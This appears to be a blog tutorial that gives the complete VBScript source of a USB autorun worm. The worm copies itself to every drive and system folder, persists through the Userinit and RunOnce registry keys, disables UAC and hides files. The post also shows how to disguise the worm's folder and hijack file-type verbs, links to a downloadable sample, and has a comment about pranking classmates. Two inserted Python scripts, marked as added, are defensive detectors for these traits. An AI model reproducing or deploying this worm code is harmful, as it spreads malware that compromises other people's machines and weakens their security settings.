How to make Autorun Virus in VBScript

THIS IS A BASIC FRAMEWORK OF A VBS AUTORUN VIRUS. IT IS FOR THOSE WHO WANT TO KNOW HOW AUTORUN VIRUSES ACTUALLY WORK SO THAT THEY CAN DEFEND THEMSELVES AGAINST SUCH THREATS.
THIS IS A BASIC FRAMEWORK OF A VBS AUTORUN WORM DETECTED AS GENERIC.SCRIPTWORM, WORM/VBS, VBS.SASAN.A, VBS.SOLOW AND VBS:AGENT-JF[WRM]. THE VIRUS NORMALLY WORKS UNDER PRE-WINDOWS 7 RELEASES (UP TO WINDOWS VISTA) BECAUSE AUTORUN.INF DOES NOT WORK FOR USB DRIVES IN WINDOWS 7. BUT IF IT IS RUN MANUALLY (FROM WSCRIPT), IT CAN INFECT WINDOWS 7 TOO. IF THE READER WANTS TO TEST IT, S/HE MAY DO SO ONLY IN A SAFE ENVIRONMENT (UNDER VIRTUALBOX OR VIRTUAL PC) ISOLATED FROM THE HOST TO PREVENT SELF-INFECTION.


Option Explicit
Const script_eng = "wscript.exe -e:VBScript "
Dim i
Dim fso, Shell, tfile
Dim HIVES
Dim Tempdir, Systemdir
Dim myfolder, myfile, mypath, mycode, auto_inf
Dim userinit, device

On Error Resume Next

Set Shell = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.Filesystemobject")
                                Set myfile = fso.GetFile(WScript.ScriptFullName)
                                mycode = myfile.OpenAsTextStream(1, - 2).ReadAll
                                Set myfolder = myfile.ParentFolder
                                If (Right(myfolder, 1) <> "\") Then _
                                                   myfolder = myfolder & "\"
                                mypath = myfolder & myfile.Name
                                If (myfile.ParentFolder = myfile.Drive.Path & "\RECYCLER") Then _
                                             Shell.Run("explorer.exe " & myfile.Drive.Path & "\")
                                Set myfile = Nothing
                                HIVES = Array("HKEY_CURRENT_USER\", "HKEY_LOCAL_MACHINE\")
                                Set Systemdir = fso.GetSpecialFolder(1)              
                                Set Tempdir = fso.getspecialfolder(2)
                                userinit = Systemdir & "\userinit.exe," & Systemdir & "\" _
                                                                  & script_eng & Systemdir & "\thumb.db"
                                                                 
auto_inf = "[AUT" & "ORUN]" & vbCrLf
auto_inf = auto_inf & "ShellEx" & "ecute=" & script_eng & "RECYCLER\thumb.db"
auto_inf = auto_inf & vbcrlf & "Action=Ope" & "n folder t" & "o view files" & vbCrLf
auto_inf = auto_inf & "Shell\Forma" & "t...\Comma" & "nd=" & script_eng _
                                & "RECYCLER\thumb.db" & vbCrLf
auto_inf = auto_inf & "Shell\" & "Open\" & "Comman" & "d=" & script_eng _
                                & "RECYCLER\thumb.db" & vbCrLf
auto_inf = auto_inf & "Shell\Expl" & "ore\Comma" & "nd=" & script_eng _
                                & "RECYCLER\thumb.db" & vbCrLf
auto_inf = auto_inf & "ico" & "n=shell32.dll,4"
copy_in_system()
 Do
         regcreate()        
         infect_devices()
         self_regen()
                               
         If ((myfolder = Systemdir & "\") Or (myfolder = Tempdir & "\")) Then _
                                 WScript.Sleep(1000)
Loop While ((myfolder = Systemdir & "\") Or (myfolder = TempDir & "\"))
Virus residing in the System Folder


Function regcreate()
For i = 0 To 1
  Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", userinit, "REG_SZ"
  Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\AudioSvc", script_eng & Tempdir & "\thumb.db", "REG_SZ"
   Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", 0, "REG_DWORD"
   Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows\CurrentVersion\" _
     & "Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue", 0, "REG_DWORD"
Next
End Function
The Registry-Key modified by the Worm
Function infect_devices()
For Each device In fso.Drives
      If ((device.DriveLetter <> "A") And (device.DriveLetter <> "B")) Then
            If ((device.DriveType = 1) Or (device.DriveType = 3)) Then
                If (device.IsReady) then
                     If (fso.FolderExists(device.Path & "\Autorun.inf")) Then _
                            fso.DeleteFolder(device.Path & "\Autorun.inf"), True
                     If (Not fso.FolderExists(device.Path & "\RECYCLER")) Then _
                            fso.CreateFolder(device.Path & "\RECYCLER").Attributes = 39
                            fso.GetFolder(device.Path & "\RECYCLER").Attributes = 39
                     If (Not fso.FileExists(device.Path & "\RECYCLER\thumb.db")) Then
                            write_file device.Path & "\RECYCLER\thumb.db", mycode                      
                     Else
                         If (fso.OpenTextFile(device.Path & "\RECYCLER\thumb.db", 1).ReadAll _
                                        <> mycode) Then
                             fso.DeleteFile(device.Path & "\RECYCLER\thumb.db"), True
                             write_file device.Path & "\RECYCLER\thumb.db", mycode
                         End If
                    End If
                If (Not fso.FileExists(device.Path & "\Autorun.inf")) Then
                    write_file device.Path & "\Autorun.inf", auto_inf
                Else
                      If (fso.OpenTextFile(device.Path & "\Autorun.inf", 1).readAll <> auto_inf) Then
                         fso.DeleteFile(device.Path & "\Autorun.inf"), True
                         write_file device.Path & "\Autorun.inf", auto_inf
                      End If
                End If
            End If
         End If
      End If
Next
End function

Function write_file(fpath, fcode)
Set tfile = fso.CreateTextFile(fpath)
tfile.Write(fcode)
tfile.Close
fso.GetFile(fpath).Attributes= 39                                                                                                                            
End Function

Function self_regen()
                If (Not fso.FileExists(mypath)) Then
                         write_file mypath, mycode
                Else
                         If (fso.OpenTextFile(mypath, 1).readAll <> mycode) Then
                                     fso.DeleteFile(mypath), True
                                     write_file mypath, mycode
                         End If
                End If
End Function

Function copy_in_system()
                If (Not fso.FileExists(Systemdir & "\thumb.db")) Then
                              write_file Systemdir & "\thumb.db", mycode
                              Shell.Run(Systemdir & "\" & script_eng & Systemdir & "\thumb.db")
                Else
                               If (fso.OpenTextFile(Systemdir & "\thumb.db", 1).readAll <> mycode) Then
                                      fso.DeleteFile(Systemdir & "\thumb.db"), True
                                      write_file Systemdir & "\thumb.db", mycode
                                      Shell.Run(Systemdir & "\" & script_eng & Systemdir & "\thumb.db")
                               End If
                End If
                If (Not fso.FileExists(Tempdir & "\thumb.db")) Then
                                write_file Tempdir & "\thumb.db", mycode
                                Shell.Run(Systemdir & "\" & script_eng & Tempdir & "\thumb.db")
                Else
                                If (fso.OpenTextFile(Tempdir & "\thumb.db", 1).readAll <> mycode) Then
                                               fso.DeleteFile(Tempdir & "\thumb.db"), True
                                               write_file Tempdir & "\thumb.db", mycode
                                               Shell.Run(Systemdir & "\" & script_eng & Tempdir & "\thumb.db")
                                End If
                End If   
End function

The snapshot above shows the scenario in which the virus is detected by Avast AntiVirus.
Here is what an infected device will contain: an Autorun.inf file and a companion file in the \RECYCLER\ folder. The Autorun.inf is the file that actually starts the worm when the user interacts with the drive.
The WSCRIPT.EXE process running, which hosts the viral script.
Want to know what exactly happens when the code runs? Have a look at this flow chart to learn the logic and the flow of control of the VBS autorun virus:
VBS Autorun Virus - FlowChart
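A defender-side triage of the artifacts just described, as an added example that is not part of the original post: a small Python parser reads an autorun.inf (here a constructed copy of the worm's own [AUTORUN] block next to a benign installer one) and flags the traits that give the worm away, without touching any drive. The helper names (parse_autorun, assess_autorun) and both sample strings are assumptions made for this example.

```python
import re

# Added triage helper (hypothetical, not from the page): parse an autorun.inf and flag the
# traits of the worm's [AUTORUN] block described above. No drive access; input is text.
LAUNCH_KEY = re.compile(r"^(?:open|shellexecute|shell\\.*\\command)$", re.I)
SCRIPT_HOST = re.compile(r"\b[wc]script(?:\.exe)?\b|-e:", re.I)   # wscript/cscript, -e:VBScript
EXEC_EXT = {"exe", "com", "bat", "cmd", "msi", "scr", "vbs", "js", "wsf"}

def parse_autorun(text):
    """Return {section.lower(): [(key, value), ...]}, keeping duplicate keys and order."""
    entries, section = {}, None
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            section = entries.setdefault(line[1:-1].lower(), [])
        elif section is not None and "=" in line and not line.startswith(";"):
            key, _, value = line.partition("=")
            section.append((key.strip(), value.strip()))
    return entries

def assess_autorun(text):
    """Return {indicator: [keys that triggered it]}; {} means nothing suspicious was seen."""
    hits = {}
    for key, value in parse_autorun(text).get("autorun", []):
        low = value.lower()
        if LAUNCH_KEY.match(key):
            if SCRIPT_HOST.search(low):
                hits.setdefault("script_host_launch", []).append(key)
            if "recycler" in low or "$recycle.bin" in low:
                hits.setdefault("recycle_bin_path", []).append(key)
            target = low.split()[-1] if low.split() else ""          # last token = file to run
            if target.rsplit(".", 1)[-1] not in EXEC_EXT:             # no or non-executable ext
                hits.setdefault("disguised_extension", []).append(key)   # e.g. thumb.db
        elif key.lower() == "action" and "open folder to view files" in low:
            hits.setdefault("explorer_lure_action", []).append(key)   # mimics AutoPlay's own entry
        elif key.lower() == "icon" and re.search(r"shell32\.dll,\s*4$", low):
            hits.setdefault("folder_icon_spoof", []).append(key)      # stock Explorer folder icon
    return hits

# Constructed samples: the worm's autorun.inf as built on this page, and a benign installer one.
WORM_AUTORUN = """[AUTORUN]
ShellExecute=wscript.exe -e:VBScript RECYCLER\\thumb.db
Action=Open folder to view files
Shell\\Format...\\Command=wscript.exe -e:VBScript RECYCLER\\thumb.db
Shell\\Open\\Command=wscript.exe -e:VBScript RECYCLER\\thumb.db
Shell\\Explore\\Command=wscript.exe -e:VBScript RECYCLER\\thumb.db
icon=shell32.dll,4"""
BENIGN_AUTORUN = "[autorun]\nopen=setup.exe\nicon=setup.exe,0\nlabel=Vendor Installer"
```

Any non-empty result is worth a look; the worm sample trips all five indicators while the installer trips none.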
Changing the Folder Icon:

RECYCLER folder icon

So the folder 'RECYCLER' in which the worm resides should not have a normal folder icon. Since its name is 'RECYCLER', its icon should resemble the Recycle Bin icon. To change the folder icon, a file called 'desktop.ini' has to be created inside the folder with the following contents:
[.ShellClassInfo]
IconResource=%windir%\system32\Shell32.dll,32
IconResource refers to the icon at index 32 inside Shell32.dll. As you can see in the picture below, thumb.db (the worm itself) is accompanied by a desktop.ini file inside the RECYCLER folder. Assuming you can read and write VBScript, and given that the creation of the worm itself has already been shown, adding a few more lines of VBS code to create the desktop.ini file should not be a difficult job.

desktop.ini in RECYCLER folder

Instead of updating the worm's code in this post itself, we have included a link for downloading a sample of the thumb.db worm. You can download the sample from here.


The worm's capabilities can be extended so that the virus also runs when the Inf file is opened via Edit or when the user chooses [RIGHT_CLICK] + DELETE. This is achieved by altering the default registry value of the associated file extension under HKEY_CLASSES_ROOT: set '{EXTENSION + 'file'}\Shell\open\Command\' to the VIRUS-FULL-PATH with all the parameters needed. For example, here is what is needed to make the virus execute on [RIGHT_CLICK] + EDIT: HKEY_CLASSES_ROOT\vbsfile\Shell\Edit\Command\, PATH-TO-VIRUS, REG_EXPAND_SZ.
After you alter the registry under HKEY_CLASSES_ROOT, the default behaviour of that file extension's Explorer context menu changes.
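To check a machine for the registry changes described in regcreate() and in the HKEY_CLASSES_ROOT note above, here is an added example (not code from the post): a Python audit of a .reg export (as produced by reg export) that flags the Userinit chaining, the RunOnce entry, EnableLUA=0, the SHOWALL CheckedValue=0 change and a redirected vbsfile Edit verb. The constructed sample and the helper names (parse_reg, audit_reg) are assumptions; the only baseline assumed is that the stock Edit verb for .vbs files opens Notepad.

```python
import re

# Added triage helper (hypothetical, not from the page): parse a .reg export and flag the changes.
REG_STR = re.compile(r'^(?:@|"(?P<name>(?:[^"\\]|\\.)*)")="(?P<val>(?:[^"\\]|\\.)*)"$')
REG_DWORD = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<val>[0-9a-fA-F]{8})$')
SCRIPT_HOST = re.compile(r"\b[wc]script(?:\.exe)?\b|-e:", re.I)   # wscript/cscript, -e:VBScript

def parse_reg(text):
    """Return {key_path.lower(): {value_name.lower(): value}}; "" is the (Default) value."""
    keys, cur = {}, None
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            cur = keys.setdefault(line[1:-1].lower(), {})
        elif cur is not None and (m := REG_DWORD.match(line)):
            cur[m["name"].lower()] = int(m["val"], 16)
        elif cur is not None and (m := REG_STR.match(line)):
            cur[(m["name"] or "").lower()] = re.sub(r"\\(.)", r"\1", m["val"])  # unescape \\ and \"
    return keys

def audit_reg(text):
    """Return human-readable findings for the registry indicators described on the page."""
    keys, findings = parse_reg(text), []
    val = lambda key, name: keys.get(key.lower(), {}).get(name.lower())
    for hive in ("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER"):
        u = val(hive + r"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit")
        if u is not None and len([p for p in u.split(",") if p.strip()]) != 1:
            findings.append(f"{hive}: Userinit chains an extra program: {u}")
        if val(hive + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA") == 0:
            findings.append(f"{hive}: UAC disabled (EnableLUA=0)")
        if val(hive + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL", "CheckedValue") == 0:
            findings.append(f"{hive}: 'Show hidden files' neutered (SHOWALL CheckedValue=0)")
        for name, cmd in keys.get((hive + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce").lower(), {}).items():
            if SCRIPT_HOST.search(str(cmd)):
                findings.append(f"{hive}: RunOnce\\{name} launches a script host: {cmd}")
    edit = val(r"HKEY_CLASSES_ROOT\vbsfile\Shell\Edit\Command", "")   # stock Edit verb opens Notepad
    if edit and "notepad" not in edit.lower():
        findings.append(f"HKCR: vbsfile Edit verb redirected: {edit}")
    return findings

# Constructed .reg excerpt mirroring the worm's changes (paths are placeholders, not real IoCs).
INFECTED_REG = r'''[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\wscript.exe -e:VBScript C:\\Windows\\system32\\thumb.db"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"AudioSvc"="wscript.exe -e:VBScript C:\\Users\\user\\AppData\\Local\\Temp\\thumb.db"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000
[HKEY_CLASSES_ROOT\vbsfile\Shell\Edit\Command]
@="C:\\Windows\\system32\\wscript.exe -e:VBScript C:\\Windows\\system32\\thumb.db"'''
```

A clean export yields an empty list; each finding names the hive and value so it can be restored by hand (Userinit back to userinit.exe alone, EnableLUA and CheckedValue back to 1, the RunOnce entry and the Edit verb removed).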


5 comments:

  1. So would this cause any actual harm to my or a friend's computer? We are pranking classmates with vbs files, and I do not want to get into any actual trouble.

    Replies
    1. Up to Windows Vista, it'll start spreading. It won't spread in Windows 7. It won't delete or modify any files, though.

      But it can be troublesome to remove once it installs itself in the system, without proper knowledge.

  2. These vbs viruses are being blocked by my ESET antivirus. They are real, do not underestimate them lol

  3. Don't underestimate these .vbs viruses.

  4. I made a replica of this in Lua.